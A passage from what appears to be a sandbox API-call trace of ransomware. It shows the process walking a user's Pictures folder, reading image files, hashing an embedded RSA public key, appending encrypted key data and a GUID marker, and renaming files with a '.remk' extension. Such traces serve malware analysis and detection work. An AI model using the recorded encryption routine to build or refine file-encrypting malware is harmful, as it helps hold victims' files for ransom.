ftCreationTime.dwHighDateTime=0x1d5e07b, ftLastAccessTime.dwLowDateTime=0xbb0c1d90, ftLastAccessTime.dwHighDateTime=0x1d5dee8, ftLastWriteTime.dwLowDateTime=0xbb0c1d90, ftLastWriteTime.dwHighDateTime=0x1d5dee8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0235.582] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd92eb9a0, ftCreationTime.dwHighDateTime=0x1d5dbd6, ftLastAccessTime.dwLowDateTime=0x8a09690, ftLastAccessTime.dwHighDateTime=0x1d5d92f, ftLastWriteTime.dwLowDateTime=0x8a09690, ftLastWriteTime.dwHighDateTime=0x1d5d92f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2kWa8l", cAlternateFileName="")) returned 1 [0235.582] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185c10 [0235.582] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185cc8 [0235.582] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185e38 [0235.582] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3185cc8 | out: hHeap=0x630000) returned 1 [0235.583] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3185c10 | out: hHeap=0x630000) returned 1 [0235.583] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74af6870, ftCreationTime.dwHighDateTime=0x1d5e091, ftLastAccessTime.dwLowDateTime=0x8b904fd0, ftLastAccessTime.dwHighDateTime=0x1d5d9e0, ftLastWriteTime.dwLowDateTime=0x8b904fd0, ftLastWriteTime.dwHighDateTime=0x1d5d9e0, nFileSizeHigh=0x0, nFileSizeLow=0x169f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F4YbH 8XORnU4B2.png", cAlternateFileName="F4YBH8~1.PNG")) returned 1 [0235.583] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6618 [0235.583] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xee) returned 0x31a4298 [0235.583] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6618 | out: hHeap=0x630000) returned 1 [0235.583] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\F4YbH 8XORnU4B2.png") returned=".png" [0235.583] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\F4YbH 8XORnU4B2.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\f4ybh 8xornu4b2.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0235.584] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=5791) returned 1 [0235.584] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0235.587] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x1679, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.587] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0235.589] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0235.589] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0235.589] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0235.589] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x169f, lpOverlapped=0x0) returned 1 [0235.590] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.590] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0235.590] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.590] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.590] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0235.591] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0235.591] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0235.591] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0235.591] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0235.591] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0235.591] GetLastError () returned 0x0 [0235.592] CryptDestroyHash (hHash=0x31de170) returned 1 [0235.592] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0235.592] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0235.592] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0235.592] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0235.592] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0235.592] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0235.592] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0235.592] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0235.592] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x16a0) returned 0x37c6278 [0235.592] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0235.592] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0235.592] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0235.592] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0235.592] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0235.592] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0235.592] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325cec0 [0235.592] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc480 [0235.592] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325cf08 [0235.592] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc4e0 [0235.593] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc468 [0235.593] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc528 [0235.593] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc4b0 [0235.593] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0235.593] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0235.593] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0235.593] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0235.593] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc468 | out: hHeap=0x630000) returned 1 [0235.593] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc4b0 | out: hHeap=0x630000) returned 1 [0235.593] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc528 | out: hHeap=0x630000) returned 1 [0235.593] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0235.593] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0235.593] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc528 [0235.593] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0235.593] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc4b0 [0235.593] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0235.593] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x37bc468 [0235.593] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0235.593] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0235.594] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0235.594] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0235.594] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0235.594] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0235.594] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0235.594] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0235.594] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0235.594] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc4b0 | out: hHeap=0x630000) returned 1 [0235.594] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0235.594] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc468 | out: hHeap=0x630000) returned 1 [0235.594] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0235.594] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0235.594] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc528 | out: hHeap=0x630000) returned 1 [0235.594] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0235.594] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0235.594] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0235.594] GetCurrentThreadId () returned 0x314 [0235.594] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0235.594] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c4b00 [0235.594] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0235.595] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0235.595] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0235.595] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0235.595] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0235.595] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0235.595] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.595] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.595] GetCurrentThreadId () returned 0x314 [0235.595] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.595] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.595] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0235.595] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.595] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.595] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.595] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.595] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0235.595] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0235.595] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0235.595] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0235.595] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0235.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x72aea0 [0235.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0235.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc528 [0235.596] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0235.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0235.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0235.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0235.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0235.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0235.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0235.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0235.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc468 [0235.596] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0235.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0235.596] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0235.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0235.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0235.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0235.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0235.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc4b0 [0235.596] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0235.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0235.597] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0235.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc4c8 [0235.597] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0235.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc540 [0235.597] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0235.597] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x169f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.597] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0235.598] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0235.598] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0235.598] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0235.598] CloseHandle (hObject=0x640) returned 1 [0235.602] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\F4YbH 8XORnU4B2.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\f4ybh 8xornu4b2.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\F4YbH 8XORnU4B2.png.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\f4ybh 8xornu4b2.png.remk")) returned 1 [0235.606] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bd408 | out: hHeap=0x630000) returned 1 [0235.606] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0235.606] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0235.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0235.608] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf604b20, ftCreationTime.dwHighDateTime=0x1d5da50, ftLastAccessTime.dwLowDateTime=0x3b1a8c10, ftLastAccessTime.dwHighDateTime=0x1d5dc69, ftLastWriteTime.dwLowDateTime=0x3b1a8c10, ftLastWriteTime.dwHighDateTime=0x1d5dc69, nFileSizeHigh=0x0, nFileSizeLow=0x1762e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Fh-vCljTYvw.gif", cAlternateFileName="FH-VCL~1.GIF")) returned 1 [0235.608] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\Fh-vCljTYvw.gif") returned=".gif" [0235.608] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\Fh-vCljTYvw.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\fh-vcljtyvw.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0235.610] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=95790) returned 1 [0235.610] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0235.613] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x17608, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.613] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0235.615] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x1762e, lpOverlapped=0x0) returned 1 [0235.616] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.616] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.616] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.616] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0235.617] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0235.617] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0235.617] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0235.617] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0235.617] GetLastError () returned 0x0 [0235.618] CryptDestroyHash 